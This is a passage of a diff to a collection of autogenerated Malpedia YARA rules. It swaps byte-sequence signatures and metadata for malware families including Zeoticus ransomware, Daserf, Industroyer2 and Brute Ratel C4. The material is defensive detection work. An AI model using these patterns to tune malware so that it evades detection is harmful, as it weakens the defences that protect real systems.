-		$sequence_6 = { b8a152f86d b9518159e1 0f45c1 b9a152f86d bac9ebae71 0f45ca bf7994f31d }
-		$sequence_7 = { eb02 31d2 83f90a 7c0f 8d48ff 0fafc8 83e101 }
-		$sequence_8 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8eab7bd0b b966078151 }
-		$sequence_9 = { e9???????? 81fe4cc3b5b8 89f3 0f852cfeffff 8b5c240c e9???????? 81fe45dc43a2 }
+		$sequence_0 = { ff35???????? ff15???????? 85c0 0f8442050000 8b45dc }
+		$sequence_1 = { 59 7510 8d85bcd8ffff 50 56 ff75fc }
+		$sequence_2 = { 898574ffffff ffd7 8bf8 56 2b7dd8 }
+		$sequence_3 = { 8d85bcd8ffff 50 e8???????? 59 8d8dbcd8ffff 83e903 803c0829 }
+		$sequence_4 = { 6a01 53 c745c464000000 895dfc 895de4 895df0 895df4 }
+		$sequence_5 = { 50 56 6a63 e8???????? 83c414 }
+		$sequence_6 = { 895dcc a4 ff15???????? 3bc3 898578ffffff 0f8465110000 ff15???????? }
+		$sequence_7 = { 752c 3975dc 7554 3975cc 754f }
+		$sequence_8 = { ff15???????? ff35???????? ff15???????? ff35???????? ff15???????? 807dd16b 741d }
+		$sequence_9 = { 59 59 50 57 ffd6 a3???????? eb54 }
 
 	condition:
-		7 of them and filesize < 2727936
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Fatal_Rat_Auto : FILE
+rule MALPEDIA_Win_Zeoticus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a3ab53f5-ddae-5778-83ad-a5bc6a6b2154"
+		id = "9de59c35-1f7d-51f9-8134-b24208326bd1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fatal_rat_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeoticus_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "18acd6224a0284d907688395a284887997a86c92f189b4ab24835c18aeeace4b"
+		logic_hash = "3f9c97113f0506e69ec31e3ee70b01bb1f52832387d7caa17b96ec4c6d0f2f8c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80495,32 +80822,32 @@ rule MALPEDIA_Win_Fatal_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 ff15???????? 3bc7 89450c 0f8415020000 8d4b02 56 }
-		$sequence_1 = { c6458265 c6458378 c6458465 885d85 c645a065 c645a167 c645a275 }
-		$sequence_2 = { 5f 5d c3 55 8bec 81ece0060000 53 }
-		$sequence_3 = { ff15???????? 8d857cffffff 50 e8???????? 85c0 59 7429 }
-		$sequence_4 = { eb34 8d859cfeffff 50 ff15???????? 8d859cfeffff 68???????? 50 }
-		$sequence_5 = { 56 ff15???????? 68???????? 56 ff15???????? 8d85a4feffff }
-		$sequence_6 = { eb19 833801 7407 b800000800 eb0d 8b4004 }
-		$sequence_7 = { 8d8568feffff 6804010000 50 56 ff15???????? 8d8568feffff 50 }
-		$sequence_8 = { 56 8b4304 8945f8 8b03 0fb74814 6683780600 8d740118 }
-		$sequence_9 = { c645ee68 c645ef70 885df0 ff15???????? 8bf8 3bfb 897df8 }
+		$sequence_0 = { 660f62f9 660fd4bc2400010000 0f284c2430 660fd4f8 660f3a0f4c241008 660fefdf 8b942414010000 }
+		$sequence_1 = { 6a15 ba???????? b90b7a9652 e8???????? 83c408 a3???????? 680c0e0000 }
+		$sequence_2 = { 33c9 66c787701110000001 90 8a8100674300 88840f90101000 41 }
+		$sequence_3 = { 2b9d74ffffff 898568ffffff 8b8544ffffff 2b4594 8b7dc8 2bbd78ffffff }
+		$sequence_4 = { 660f62ca 660f6e9424a4000000 0f295c2430 0f28442430 660f6e5c2444 660f62c1 660f6e4c2440 }
+		$sequence_5 = { 8b74240c ba???????? 680f8ed51c 6a16 b932347982 c744241801000000 c744242402000000 }
+		$sequence_6 = { 8d4901 83ea01 75f5 8bcb 2bf3 ba20000000 0f1f8000000000 }
+		$sequence_7 = { 6a03 68???????? 6a0a 68???????? e8???????? 685d0b4077 6a0a }
+		$sequence_8 = { 660f72d00e 660f72f412 660fefa590feffff 660fefe0 0f28c5 660ffec7 0f29a530ffffff }
+		$sequence_9 = { 2b9d78ffffff 2bbd7cffffff 2b7580 2b5584 898524ffffff 8b8534ffffff 8945b4 }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 468992
 }
-rule MALPEDIA_Win_Flying_Dutchman_Auto : FILE
+rule MALPEDIA_Win_Daserf_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "886d0773-9268-59b5-bd3b-294bdb3b9350"
+		id = "a6f15599-4f13-54ba-bcec-a3b5030d8753"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flying_dutchman_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.daserf_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "db7ff3ab0ec7e2a2a2d94a46706f998e00b81b5002023e59f4f386401742ebb6"
+		logic_hash = "1bad6c4b5752fd8c6fe15d5fabea81e1efa1678a4e2b8ef0d9b688e6637ca84b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80534,32 +80861,38 @@ rule MALPEDIA_Win_Flying_Dutchman_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f911 770e 6a0d 58 5d c3 8b04cd94b00110 }
-		$sequence_1 = { ffb564deffff ff15???????? 85c0 7459 8b8568deffff 3bc3 744f }
-		$sequence_2 = { 48 83c8fc 40 83f801 0f85d3000000 c747140f000000 }
-		$sequence_3 = { 8bec 81ecc8000000 a1???????? 33c5 8945fc 8d8538ffffff }
-		$sequence_4 = { 83c8ff eb03 0345ec 8b4dfc 33cd e8???????? c9 }
-		$sequence_5 = { 8d42e0 3c58 770f 0fbec2 0fbe80486e0110 }
-		$sequence_6 = { e8???????? c9 c20800 55 8bec 81ec38040000 a1???????? }
-		$sequence_7 = { 57 8985e4fdffff 8935???????? e8???????? 8b35???????? 33ff }
-		$sequence_8 = { 56 8b7508 57 bbc8000000 53 6a00 bf???????? }
-		$sequence_9 = { 8d442410 89742408 8d4802 668b10 83c002 6685d2 75f5 }
+		$sequence_0 = { 81c328a25d5a 0545c9ac22 05c26febe9 81c3417cc57d 2dcb488290 81c31b4b740f }
+		$sequence_1 = { f7d2 f7d2 33c0 93 899c2440f3ffff 8bd8 }
+		$sequence_2 = { 2d5f36eba3 05b4cb7144 81c347f7f911 05cae31a61 81eb415d0bcb 05c5fc7980 }
+		$sequence_3 = { 81c3747ffb87 055952dc58 2d0b346d09 056fb8227f 81ebd0466de5 }
+		$sequence_4 = { 6a32 8d36 68???????? 8d12 ff75f8 90 }
+		$sequence_5 = { 81c313bc171f 81c34b9369e2 81c3eb64e095 055b137a14 81eb119d1f79 }
+		$sequence_6 = { ffd7 83c40c 8d8594fcffff 50 }
+		$sequence_7 = { ff35???????? 7500 56 7500 ffd7 }
+		$sequence_8 = { 8b842400f1ffff 81eb1705fc0c 90 0545b15a4c 90 2d9acaaf65 }
+		$sequence_9 = { 81c3ab7990c3 05cb3760e1 81c397e4ecdc 81c3e75ff275 05fbaa91ae 81eb5851999b }
+		$sequence_10 = { 05f1ad59f9 90 81eb704d8e1f 90 81c37208ee7c f7d1 }
+		$sequence_11 = { f7d2 f7d2 81c31bdfefc0 7500 81eb5daf8042 }
+		$sequence_12 = { 05a9b31bec 81c3d6659b48 81eb3e24cc02 05bb9b4196 81eb944686e1 81eb84d90d01 }
+		$sequence_13 = { ffd7 90 ff75fc 8d36 }
+		$sequence_14 = { 83f8ff 894508 0f8405020000 8b8594fdffff 8b3d???????? 83e010 }
+		$sequence_15 = { 81eb31750679 8d36 81c30378b463 f7d6 f7d6 }
 
 	condition:
-		7 of them and filesize < 276480
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Thunker_Auto : FILE
+rule MALPEDIA_Win_Coinminer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6a7578c2-9954-5c27-9789-75ce33a8978d"
+		id = "e53c74f5-8d04-54ad-a733-6c3d22f8d0e4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.thunker_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.coinminer_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "324dbb01ab87806e82adbcf168652688ad932f1c3e2806c75596e6aeba36cca3"
+		logic_hash = "06dcc1977408b543966283c5e3d6aefe14c67fca3216b7316faa289a6df0dd9d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80573,32 +80906,32 @@ rule MALPEDIA_Win_Thunker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 750b 68???????? e8???????? 59 68???????? 68???????? 6801000080 }
-		$sequence_1 = { 5b 5d c3 55 89e5 81ecc8010000 }
-		$sequence_2 = { 51 50 53 56 57 8b750c 8365f800 }
-		$sequence_3 = { e8???????? 83c40c 89c7 e8???????? 8985ecfdffff }
-		$sequence_4 = { baabaaaaaa f7e2 d1ea 8995dcfdffff 89d0 }
-		$sequence_5 = { e8???????? 6a06 53 e8???????? 83c410 eb40 6a04 }
-		$sequence_6 = { 83c40c 8d8544edffff 50 e8???????? 8985c4edffff 8b400c }
-		$sequence_7 = { e8???????? eb07 c685fbeeffff01 80bdfbeeffff00 }
-		$sequence_8 = { 83c40c 8d8544edffff 50 e8???????? 8985c4edffff }
-		$sequence_9 = { 89df 31c0 f9 19c9 }
+		$sequence_0 = { 8bec 83ec10 8955f8 894dfc 56 57 85c9 }
+		$sequence_1 = { 742e 837d1800 0f85cf020000 6800080000 }
+		$sequence_2 = { a3???????? c705????????19c98f00 c705????????73c98f00 c705????????f8c98f00 a3???????? c705????????bdbf8f00 }
+		$sequence_3 = { 8b0cbda05f9a00 f6440e0401 743d 833c0eff 7437 }
+		$sequence_4 = { 8935???????? 85c9 7504 85f6 745b 8b7d14 }
+		$sequence_5 = { 33c0 0f57c0 6689842450070000 33f6 660f13442440 }
+		$sequence_6 = { c744242400004000 6a00 50 c744243000000000 c744246c00100000 c744247000000000 c744247400f00400 }
+		$sequence_7 = { b8???????? c705????????88c88f00 a3???????? c705????????19c98f00 c705????????73c98f00 }
+		$sequence_8 = { 7523 e8???????? 8bf8 8bca 893d???????? }
+		$sequence_9 = { 55 8bec a1???????? 81ec9c010000 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 1523712
 }
-rule MALPEDIA_Win_Industroyer2_Auto : FILE
+rule MALPEDIA_Win_Metadatabin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "be2f5050-30a2-53df-a694-0ba33b5871cf"
+		id = "d06dd743-35cf-5bb7-aeb8-d54914ce18a9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.industroyer2_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.metadatabin_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "94208b597eddeff9489860d6342fc47049a5b4b079735882fa37a055dd142db4"
+		logic_hash = "6937a202ef9f0a455ba922507557ae6df15b8a9ec19545fd7cb48a075af80798"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80612,71 +80945,71 @@ rule MALPEDIA_Win_Industroyer2_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8bec 83ec08 837d0800 7504 33c0 eb29 }
-		$sequence_1 = { 051d000100 50 68???????? e8???????? }
-		$sequence_2 = { 8b45fc 837c901000 7425 8b4dfc 8b5108 8b45fc }
-		$sequence_3 = { 51 e8???????? 8845ff 8b55f8 52 }
-		$sequence_4 = { 8b4dec 89410c 8b55fc 83c201 8955fc eb0e c745e804680000 }
-		$sequence_5 = { 8b4df8 83e140 7540 e8???????? 8bc8 e8???????? }
-		$sequence_6 = { 8b4df0 51 ff15???????? 85c0 7406 c645ff01 eb04 }
-		$sequence_7 = { 83ba600d010000 7e41 e8???????? 8bc8 e8???????? 68b3680000 8b4508 }
-		$sequence_8 = { 51 ff15???????? 8b85dcfeffff eb21 8d95d4feffff }
-		$sequence_9 = { c745ecffffffff eb15 8b450c c6801800010001 }
+		$sequence_0 = { 8b45f0 894708 f20f1045e8 f20f1107 e8???????? 6a0c 6a00 }
+		$sequence_1 = { 8d4aff 84c0 79dd 39f9 c745ec00000000 74bd 0fb65afe }
+		$sequence_2 = { 8b542468 0fa4fe0d 21842400030000 0fa4cb0d 8b842498000000 8bbc2440020000 89b424e0020000 }
+		$sequence_3 = { 8b7df0 8b5de4 83fa08 725e 8d72f8 39f1 8975e0 }
+		$sequence_4 = { e8???????? b901000000 31d2 e9???????? 8b442418 89742430 895c2434 }
+		$sequence_5 = { c784246605000000000000 c784246a05000000000000 c784246e05000000000000 c784247205000000000000 c784247605000000000000 c784247a05000000000000 c684247e05000000 }
+		$sequence_6 = { f20f115014 f20f11481c 837e4c00 0f85f4010000 e9???????? 8b4c2450 8b542460 }
+		$sequence_7 = { 8d4e2c e8???????? eb08 8d4e20 e8???????? 8b465c 85c0 }
+		$sequence_8 = { 8b542438 c104240c 89442464 8b442408 c144246410 339424e4000000 338424a0000000 }
+		$sequence_9 = { f00fc106 83e0c0 83f840 750e 8b4614 56 89d7 }
 
 	condition:
-		7 of them and filesize < 100352
+		7 of them and filesize < 1263616
 }
-rule MALPEDIA_Win_Tonerjam_Auto : FILE
+rule MALPEDIA_Win_Unidentified_101_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "82fd263f-2277-5710-bde1-c5f381e7b3bb"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonerjam"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tonerjam_auto.yar#L1-L129"
+		id = "1e5a977c-e7e9-5732-97b6-6aadc4f691fc"
+		date = "2023-03-28"
+		modified = "2023-04-07"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_101"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_101_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "099b04145c5c37971e7ea839a0239f9aa67c9ef01dc57a28edbabde3d3d1e624"
+		logic_hash = "71f0751fbd77a928634515b558d06922b4bf4a312042d6abbd6ba70171c64843"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20230328"
+		malpedia_hash = "9d2d75cef573c1c2d861f5197df8f563b05a305d"
+		malpedia_version = "20230407"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b902000000 cd29 488d0d1ee10100 e8???????? 488b442438 488905???????? 488d442438 }
-		$sequence_1 = { 488d3547500100 48895c2420 488d0593660100 483bd8 7419 483933 740e }
-		$sequence_2 = { ff15???????? 488b8dd00d0000 4833cd e8???????? 488b9df00d0000 488bb5f80d0000 }
-		$sequence_3 = { 41b808020000 e8???????? 660f6f15???????? 488d0513e40100 33ed 448bcd f30f6f40f0 }
-		$sequence_4 = { 488d9424e0000000 488d144a 482bc1 7432 4c8d0d32bc0100 b9feffff7f }
-		$sequence_5 = { 7474 83fb01 756a 8b0d???????? 48893d???????? e8???????? e8???????? }
-		$sequence_6 = { 4c8d4c2440 488bd0 4c89742420 488bcb 488bf0 ff15???????? 4c8d4c2460 }
-		$sequence_7 = { 48894604 b906000000 48898620020000 0fb7c0 66f3ab 488d3d18370100 482bfe }
-		$sequence_8 = { e8???????? 41b804010000 488d542420 33c9 }
-		$sequence_9 = { 85c9 7858 3b15???????? 7350 488bca 4c8d05d9de0000 83e13f }
+		$sequence_0 = { c70016000000 e8???????? 83c8ff e9???????? 498bc4 488d0ddb070100 83e03f }
+		$sequence_1 = { 6689842404010000 b865000000 6689842406010000 33c0 6689842408010000 }
+		$sequence_2 = { 33c0 b968000000 f3aa 488d842400010000 4889442448 488d842430020000 4889442440 }
+		$sequence_3 = { 4889742410 57 4883ec20 418bf0 4c8d0debb40000 8bda 4c8d05dab40000 }
+		$sequence_4 = { c744243000000000 4c8d4c2430 4c8b442440 8b542468 488b4c2460 }
+		$sequence_5 = { c68424e900000065 c68424ea00000057 c68424eb00000000 c644243052 c644243165 c644243261 c644243364 }
+		$sequence_6 = { 428a8c1910e40100 4c2bc0 418b40fc 4d894108 d3e8 41894120 }
+		$sequence_7 = { 48c744242000000000 4c8d8c24c8000000 448b442450 488b542458 488b4c2470 ff15???????? }
+		$sequence_8 = { 41b804010000 488d942400030000 33c9 ff15???????? c744245801000000 e8???????? 833d????????01 }
+		$sequence_9 = { 7528 48833d????????00 741e 488d0dd8450100 e8???????? 85c0 740e }
 
 	condition:
-		7 of them and filesize < 315392
+		7 of them and filesize < 402432
 }
-rule MALPEDIA_Win_Sepulcher_Auto : FILE
+rule MALPEDIA_Win_Brute_Ratel_C4_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "226eeb17-2cf9-5d07-9607-4486b199b293"
+		id = "2e0925bc-6929-57fd-a204-d14352ab043b"
 		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sepulcher_auto.yar#L1-L127"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.brute_ratel_c4_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "e1aaa31878ffe75af7745e7155d1b8f026b2d8b5dc07360be87f7b721a2b24ec"
+		logic_hash = "494c4fae1039f425b8c7198dfaa8d777cff4b0b0868ed2b5b99463571dc5c16b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80690,32 +81023,38 @@ rule MALPEDIA_Win_Sepulcher_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { fe4123 5d c20800 55 8bec 51 53 }
-		$sequence_1 = { be00001000 eb02 8bf1 81bd28d2ffffee030000 7525 6a00 8d8520d2ffff }
-		$sequence_2 = { 59 33c0 8dbd68ffffff f3ab 8d8568ffffff }
-		$sequence_3 = { 56 53 e8???????? 85c0 743d 6a00 8d8520d2ffff }
-		$sequence_4 = { 50 6a00 8d85e8f9ffff 50 ff15???????? 85c0 }
-		$sequence_5 = { 894db8 8975b4 8945bc 85f6 0f8497000000 85c0 }
-		$sequence_6 = { 6a00 50 e8???????? 83c40c 8d85e0f7ffff 68ff000000 }
-		$sequence_7 = { 59 ebbd 8b470c 8903 05ffff0000 50 e8???????? }
-		$sequence_8 = { e8???????? 59 ff75bc 8bf8 8bce 57 e8???????? }
-		$sequence_9 = { d1e8 894234 8b4a38 0faf4a34 8b4214 }
+		$sequence_0 = { ff15???????? b801000000 4883c448 c3 48894c2408 }
+		$sequence_1 = { 4154 55 57 56 53 4883ec20 4c8d257f1e0400 }
+		$sequence_2 = { 89442438 4863442430 486bc010 488d0de32e0400 4803c8 488bc1 48634c2434 }
+		$sequence_3 = { 48c744242800000000 41b800060400 488d15d02f0000 488d4c2420 e8???????? }
+		$sequence_4 = { ffcd 85c0 75c7 4801de 8b4710 }
+		$sequence_5 = { 741a 85f6 740e 4889c1 baffffffff ff15???????? }
+		$sequence_6 = { 4533c0 ba01000000 48b90000008001000000 ff9424a0000000 89842480000000 83bc248000000000 750f }
+		$sequence_7 = { e8???????? 4889442428 4c8d0532200000 488b542428 }
+		$sequence_8 = { 0f1107 e8???????? 4885f6 7424 }
+		$sequence_9 = { 418b4cb708 458b44b70c 4c01f9 49d1e8 488b542430 }
+		$sequence_10 = { 83782800 0f8491000000 488b442430 83782000 7465 488b442430 }
+		$sequence_11 = { 418b44b710 418b3407 498d2c07 4883c504 ffce 660f1f440000 }
+		$sequence_12 = { 488b2d???????? 4889ce 895500 89d3 }
+		$sequence_13 = { 4c8d0532200000 488b542428 488d4c2420 e8???????? }
+		$sequence_14 = { 0f84d7000000 83f910 0f8550020000 0fb737 81e2c0000000 6685f6 }
+		$sequence_15 = { 83782000 7465 488b442430 488b00 8b4028 488b4c2440 }
 
 	condition:
-		7 of them and filesize < 279552
+		7 of them and filesize < 607232
 }
-rule MALPEDIA_Win_Faketc_Auto : FILE
+rule MALPEDIA_Win_Duuzer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c5dc084d-e278-57fb-9514-ebf606045902"
+		id = "b9aa8686-ae5c-522f-84d5-1ffe739b66d7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.faketc_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.duuzer_auto.yar#L1-L148"
 		license_url = "N/A"
-		logic_hash = "d4858f4d36b9ea8cb8d8cc99b63821ae69695a27a1935e91bfea486ad5660c7d"
+		logic_hash = "0a972badbc054d0ce47d3497dce1a043373ba372ad2c5fee4eff7c656c3de915"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80729,32 +81068,37 @@ rule MALPEDIA_Win_Faketc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 837c245c08 885c2418 895c2428 897c242c 720d }
-		$sequence_1 = { ff15???????? a1???????? 50 68af130000 53 ffd7 50 }
-		$sequence_2 = { 8b450c 894218 8b4dfc c7412001000000 eb04 33c0 eb1e }
-		$sequence_3 = { e8???????? 83c40c 397d08 7454 8b85ccfbffff be10000000 39b5e0fbffff }
-		$sequence_4 = { ff5510 83c408 3bf4 e8???????? 85c0 7423 8b4d08 }
-		$sequence_5 = { c7430401000000 c70301000000 8d9b00000000 8b13 8bc2 33c9 6bc02c }
-		$sequence_6 = { 8b049518e85f00 33049d18e85f00 c1ef10 81e7ff000000 3304bd18e45f00 899c2498000000 3304ad18dc5f00 }
-		$sequence_7 = { e8???????? a3???????? 68fa030000 57 ffd3 6a00 6a00 }
-		$sequence_8 = { d1e9 33ed 0be8 8b442470 c1e31f 0bd9 8b4c2474 }
-		$sequence_9 = { e8???????? 83c408 83bdd8fdffff00 7516 8b85d4fdffff 50 e8???????? }
+		$sequence_0 = { 83f804 7408 83c8ff e9???????? }
+		$sequence_1 = { 44899d20230000 e8???????? 33c0 488d8dce0f0000 }
+		$sequence_2 = { 40 8985b0cbffff 3bc3 0f8c55fcffff b808000000 }
+		$sequence_3 = { 488bcb c744242801000000 c744242003000000 ff15???????? 4c8be0 }
+		$sequence_4 = { c78524f4ffff5ae5bef3 c78528f4ffff83f7223e c7852cf4ffff8498990b c78530f4ffffc41f6f89 }
+		$sequence_5 = { 66f3a7 7554 488b0d???????? 488d542420 41b8c0200000 }
+		$sequence_6 = { 6800040000 52 e8???????? 8d85f8f7ffff 6a5c }
+		$sequence_7 = { 8988180b0000 8d887c0a0000 8988300b0000 33c9 c780200b0000907f4200 }
+		$sequence_8 = { c785b8feffff47484e4c c785bcfeffff5b7e2929 c785c0feffff295e5a1b c785c4feffff761a1b07 c785c8feffff6d656529 }
+		$sequence_9 = { c3 53 8b1d???????? 33c9 bf???????? }
+		$sequence_10 = { 488b8ba0000000 488d051b450100 483bc8 7405 e8???????? }
+		$sequence_11 = { ff15???????? 85db 7e43 488b1d???????? }
+		$sequence_12 = { 8d8d843effff 51 52 e8???????? }
+		$sequence_13 = { 41b902000000 4533c0 488bcb e8???????? }
+		$sequence_14 = { 48895c2468 498bd4 4c897c2420 48397e20 7408 }
 
 	condition:
-		7 of them and filesize < 6864896
+		7 of them and filesize < 491520
 }
-rule MALPEDIA_Win_Lokipws_Auto : FILE
+rule MALPEDIA_Win_Sykipot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5db76a16-385c-53b6-855b-1bbc58a2e30f"
+		id = "7dfa6014-8de4-5034-9d3e-e952369ddc5e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lokipws_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sykipot_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "f7396cac0e0e8581cb9065a2315499eb607a41e3e7300cb035a34c55b22b36af"
+		logic_hash = "6b98694b9b7bab0c760215e0200ed7148a92e1d0f8160cc9d832d1342f3407bf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80768,32 +81112,32 @@ rule MALPEDIA_Win_Lokipws_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 6a00 57 e8???????? 6a0c }
-		$sequence_1 = { e8???????? 33c0 83c418 40 c3 6a00 6a00 }
-		$sequence_2 = { 8945f4 8b4514 6a00 ff7518 8945f8 8d45f8 8365fc00 }
-		$sequence_3 = { 53 e8???????? 59 59 85c0 7564 8d8530ffffff }
-		$sequence_4 = { 56 57 6800040000 e8???????? c70424???????? be???????? 6a00 }
-		$sequence_5 = { 51 ffd0 33c0 50 50 57 }
-		$sequence_6 = { 58 6a66 5f 6a25 668945f6 33c0 668945fc }
-		$sequence_7 = { 895dec ff75fc c745f005000000 ff75f4 56 e8???????? 83c420 }
-		$sequence_8 = { 8b7810 8b5910 0f849e000000 83651000 8d7510 }
-		$sequence_9 = { 8bec 83ec0c 56 6a04 e8???????? 8bf0 }
+		$sequence_0 = { 89842420030000 b93e000000 33c0 8dbc2424030000 f3ab ff15???????? 50 }
+		$sequence_1 = { f3a4 ffd3 83c408 a3???????? 85c0 }
+		$sequence_2 = { 8d8c2418030000 68???????? 51 ffd7 83c408 85c0 }
+		$sequence_3 = { 68???????? 68???????? 8bf0 ffd5 83c414 3bc3 }
+		$sequence_4 = { 8bcd 4f c1e902 f3a5 8bcd 8d842488000000 }
+		$sequence_5 = { 895304 8bd7 895308 8bd4 8902 }
+		$sequence_6 = { 52 68f3010000 50 56 ffd7 85c0 74ae }
+		$sequence_7 = { 8b44241c 85c0 0f84c8000000 55 50 }
+		$sequence_8 = { f3ab 8b0d???????? a1???????? 898c2418030000 89842420030000 b93e000000 }
+		$sequence_9 = { 6a00 8d842414020000 6a1a 50 6a00 ff15???????? }
 
 	condition:
-		7 of them and filesize < 1327104
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Yorekey_Auto : FILE
+rule MALPEDIA_Win_Enfal_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eff8b001-6508-5d1e-8689-b1f2eb9999f7"
